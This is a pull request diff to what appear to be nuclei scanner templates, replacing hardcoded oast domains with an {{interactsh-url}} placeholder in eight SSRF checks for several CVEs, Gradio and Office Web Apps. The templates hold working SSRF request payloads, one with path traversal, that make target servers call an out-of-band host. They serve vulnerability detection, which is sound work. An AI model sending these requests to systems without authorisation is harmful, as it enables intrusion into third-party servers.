### PR TITLE
Updated 8x tempalates to user interactsh-url over oast.tld

### DIFF
--- a/http/cves/2021/CVE-2021-24472.yaml
+++ b/http/cves/2021/CVE-2021-24472.yaml
@@ -37,7 +37,7 @@ info:
 http:
   - method: GET
     path:
-      - '{{BaseURL}}/wp1/home-18/?qtproxycall=https://oast.me'
+      - '{{BaseURL}}/wp1/home-18/?qtproxycall=https://{{interactsh-url}}'
 
     matchers-condition: and
     matchers:

--- a/http/cves/2021/CVE-2021-27670.yaml
+++ b/http/cves/2021/CVE-2021-27670.yaml
@@ -38,7 +38,7 @@ info:
 http:
   - method: GET
     path:
-      - '{{BaseURL}}/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live'
+      - '{{BaseURL}}/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://{{interactsh-url}}'
 
     matchers-condition: and
     matchers:

--- a/http/cves/2021/CVE-2021-29490.yaml
+++ b/http/cves/2021/CVE-2021-29490.yaml
@@ -36,8 +36,8 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/Images/Remote?imageUrl=https://oast.me/"
-      - "{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=https://oast.me/&ProviderName=TheMovieDB"
+      - "{{BaseURL}}/Images/Remote?imageUrl=https://{{interactsh-url}}/"
+      - "{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=https://{{interactsh-url}}/&ProviderName=TheMovieDB"
 
     stop-at-first-match: true
     matchers:

--- a/http/cves/2022/CVE-2022-41412.yaml
+++ b/http/cves/2022/CVE-2022-41412.yaml
@@ -33,7 +33,7 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4"
+      - "{{BaseURL}}/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://{{interactsh-url}}/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4"
 
     matchers-condition: and
     matchers:

--- a/http/cves/2022/CVE-2022-43140.yaml
+++ b/http/cves/2022/CVE-2022-43140.yaml
@@ -38,7 +38,7 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/getCorsFile?urlPath={{base64('https://oast.me')}}"
+      - "{{BaseURL}}/getCorsFile?urlPath={{base64('https://{{interactsh-url}}')}}"
 
     matchers:
       - type: word

--- a/http/cves/2024/CVE-2024-1021.yaml
+++ b/http/cves/2024/CVE-2024-1021.yaml
@@ -37,7 +37,7 @@ http:
   - method: GET
     path:
       - "{{BaseURL}}"
-      - "{{BaseURL}}/filex/read-raw?url=http://oast.me&cut=1"
+      - "{{BaseURL}}/filex/read-raw?url=http://{{interactsh-url}}&cut=1"
 
     matchers:
       - type: dsl

--- a/http/vulnerabilities/gradio/gradio-ssrf.yaml
+++ b/http/vulnerabilities/gradio/gradio-ssrf.yaml
@@ -26,7 +26,7 @@ http:
         Host: {{Hostname}}
         Content-Type: application/json
 
-        {"component_id": "{{fuzz_component_id}}", "data": "http://oast.me", "fn_name": "download_temp_copy_if_needed", "session_hash": "aaaaaaaaaaa"}
+        {"component_id": "{{fuzz_component_id}}", "data": "http://{{interactsh-url}}", "fn_name": "download_temp_copy_if_needed", "session_hash": "aaaaaaaaaaa"}
 
       - |
         GET /file={{download_path}} HTTP/1.1

--- a/http/vulnerabilities/microsoft/office-webapps-ssrf.yaml
+++ b/http/vulnerabilities/microsoft/office-webapps-ssrf.yaml
@@ -20,7 +20,7 @@ variables:
 http:
   - raw:
       - |
-        GET /oh/wopi/files/@/wFileId/contents?wFileId=http://{{oast}}/{{string}}.xlsx%3fbody={{string}}%26header=Location:http://oast.pro%26status=302&access_token_ttl=0 HTTP/1.1
+        GET /oh/wopi/files/@/wFileId/contents?wFileId=http://{{oast}}/{{string}}.xlsx%3fbody={{string}}%26header=Location:http://{{oast}}%26status=302&access_token_ttl=0 HTTP/1.1
         Host: {{Hostname}}
 
     matchers:


### PR DESCRIPTION
Updated 8x templates to use `{{interact-sh}}` over oast[.]TLD. This change is primarily for users who wish to control where their data is going, e.g. supplying their own interactsh server and expecting their data to go there rather than a hardcoded domain.

Caveat, there will be other templates that I've missed. I did a quick search for anything that has a hardcoded domain and is checking the response for  "Interactsh Server".